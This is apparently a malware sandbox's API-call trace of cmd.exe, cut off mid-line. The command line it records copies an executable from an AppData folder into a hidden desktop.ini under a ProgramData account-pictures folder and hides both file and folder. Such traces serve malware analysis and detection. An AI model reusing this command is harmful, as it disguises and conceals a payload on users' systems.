VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.815] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0192.815] GetConsoleOutputCP () returned 0x1b5 [0192.815] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.816] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0192.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.816] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0192.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.816] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.816] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.816] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.816] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.816] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0192.816] GetEnvironmentStringsW () returned 0x4d04b0* [0192.817] FreeEnvironmentStringsW (penv=0x4d04b0) returned 1 [0192.817] GetEnvironmentStringsW () returned 0x4d04b0* [0192.817] FreeEnvironmentStringsW (penv=0x4d04b0) returned 1 [0192.817] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebb4 | out: phkResult=0x30ebb4*=0x40) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x60, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x1, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x1, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x0, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x40, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x40, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x40, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegCloseKey (hKey=0x40) returned 0x0 [0192.817] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebb4 | out: phkResult=0x30ebb4*=0x40) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x40, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x1, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x1, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x0, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x9, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x9, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x9, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegCloseKey (hKey=0x40) returned 0x0 [0192.817] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639a [0192.817] srand (_Seed=0x5b88639a) [0192.817] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"" [0192.818] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"" [0192.818] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.818] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d1c10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0192.818] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.818] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.818] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.818] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0192.818] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0192.818] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0192.818] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0192.818] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0192.818] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0192.818] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0192.818] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0192.818] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0192.818] GetEnvironmentStringsW () returned 0x4d2600* [0192.819] FreeEnvironmentStringsW (penv=0x4d2600) returned 1 [0192.819] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.819] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.819] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0192.819] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0192.819] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0192.819] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0192.819] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0192.819] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0192.819] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0192.819] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0192.819] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f980 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.819] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f980, lpFilePart=0x30f97c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f97c*="Desktop") returned 0x18 [0192.819] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.819] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f6fc | out: lpFindFileData=0x30f6fc) returned 0x4d0c90 [0192.819] FindClose (in: hFindFile=0x4d0c90 | out: hFindFile=0x4d0c90) returned 1 [0192.819] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f6fc | out: lpFindFileData=0x30f6fc) returned 0x4d0c90 [0192.819] FindClose (in: hFindFile=0x4d0c90 | out: hFindFile=0x4d0c90) returned 1 [0192.819] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f6fc | out: lpFindFileData=0x30f6fc) returned 0x4d0c90 [0192.820] FindClose (in: hFindFile=0x4d0c90 | out: hFindFile=0x4d0c90) returned 1 [0192.820] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.820] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0192.820] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0192.820] GetEnvironmentStringsW () returned 0x4d04b0* [0192.820] FreeEnvironmentStringsW (penv=0x4d04b0) returned 1 [0192.820] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.820] GetConsoleOutputCP () returned 0x1b5 [0192.820] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.820] GetUserDefaultLCID () returned 0x409 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fac0, cchData=128 | out: lpLCData="0") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fac0, cchData=128 | out: lpLCData="0") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fac0, cchData=128 | out: lpLCData="1") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0192.821] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0192.822] GetConsoleTitleW (in: lpConsoleTitle=0x4c0ad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.822] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.822] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0192.822] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0192.822] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0192.823] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0192.823] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0192.823] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0192.823] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0192.823] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0192.823] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0192.823] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0192.825] _wcsicmp (_String1="del", _String2=")") returned 59 [0192.825] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0192.825] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0192.825] _wcsicmp (_String1="IF", _String2="del") returned 5 [0192.825] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0192.825] _wcsicmp (_String1="REM", _String2="del") returned 14 [0192.825] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0192.827] _wcsicmp (_String1="type", _String2=")") returned 75 [0192.827] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0192.827] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0192.827] _wcsicmp (_String1="IF", _String2="type") returned -11 [0192.827] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0192.827] _wcsicmp (_String1="REM", _String2="type") returned -2 [0192.827] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0192.832] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.832] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0192.837] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.837] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0xffffffff [0192.838] GetLastError () returned 0x2 [0192.838] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0xffffffff [0192.838] GetLastError () returned 0x2 [0192.838] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0x4d2560 [0192.838] FindClose (in: hFindFile=0x4d2560 | out: hFindFile=0x4d2560) returned 1 [0192.838] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0xffffffff [0192.838] GetLastError () returned 0x2 [0192.838] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0x4d2560 [0192.838] FindClose (in: hFindFile=0x4d2560 | out: hFindFile=0x4d2560) returned 1 [0192.838] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0192.838] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0192.838] GetConsoleTitleW (in: lpConsoleTitle=0x30f4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.919] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f370, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f438 | out: lpAttributeList=0x30f370, lpSize=0x30f438) returned 1 [0192.919] UpdateProcThreadAttribute (in: lpAttributeList=0x30f370, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f430, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f370, lpPreviousValue=0x0) returned 1 [0192.919] GetStartupInfoW (in: lpStartupInfo=0x30f32c | out: lpStartupInfo=0x30f32c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0192.919] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0192.920] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f3cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f418 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", lpProcessInformation=0x30f418*(hProcess=0x50, hThread=0x4c, dwProcessId=0xea0, dwThreadId=0xe38)) returned 1 [0192.970] CloseHandle (hObject=0x4c) returned 1 [0192.970] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0192.970] GetEnvironmentStringsW () returned 0x4d09e0* [0192.970] FreeEnvironmentStringsW (penv=0x4d09e0) returned 1 [0192.970] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0193.063] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f30c | out: lpExitCode=0x30f30c*=0x0) returned 1 [0193.063] CloseHandle (hObject=0x50) returned 1 [0193.063] _vsnwprintf (in: _Buffer=0x30f454, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f318 | out: _Buffer="00000000") returned 8 [0193.063] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0193.063] GetEnvironmentStringsW () returned 0x4d25b0* [0193.063] FreeEnvironmentStringsW (penv=0x4d25b0) returned 1 [0193.063] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.063] GetEnvironmentStringsW () returned 0x4d25b0* [0193.063] FreeEnvironmentStringsW (penv=0x4d25b0) returned 1 [0193.063] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f370 | out: lpAttributeList=0x30f370) [0193.063] GetConsoleTitleW (in: lpConsoleTitle=0x30f6f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.064] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x30e768, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x30e76c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x30e768*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0193.064] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0193.064] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0193.064] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0193.064] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\desktop.ini")) returned 0xffffffff [0193.064] GetLastError () returned 0x2 [0193.064] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1")) returned 0x2010 [0193.064] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0193.064] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0193.064] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\desktop.ini")) returned 0xffffffff [0193.064] GetLastError () returned 0x2 [0193.065] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x4d363c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d363c) returned 0xffffffff [0193.065] GetLastError () returned 0x2 [0193.065] _get_osfhandle (_FileHandle=2) returned 0xb [0193.065] GetFileType (hFile=0xb) returned 0x2 [0193.065] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0193.065] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30f168 | out: lpMode=0x30f168) returned 1 [0193.065] _get_osfhandle (_FileHandle=2) returned 0xb [0193.065] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x30f19c | out: lpConsoleScreenBufferInfo=0x30f19c) returned 1 [0193.065] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0193.066] GetFileType (hFile=0x7) returned 0x2 [0193.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.066] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f88c | out: lpMode=0x30f88c) returned 1 [0193.066] _dup (_FileHandle=1) returned 3 [0193.066] _close (_FileHandle=1) returned 0 [0193.067] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini", _String2="con") returned -53 [0193.067] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f85c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0193.067] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0193.067] GetConsoleTitleW (in: lpConsoleTitle=0x30f68c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.067] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x30f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f1f0) returned 0x4d0830 [0193.067] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0193.067] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0193.067] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0193.068] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.069] GetFileType (hFile=0x50) returned 0x1 [0193.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.069] GetFileType (hFile=0x50) returned 0x1 [0193.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.069] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, 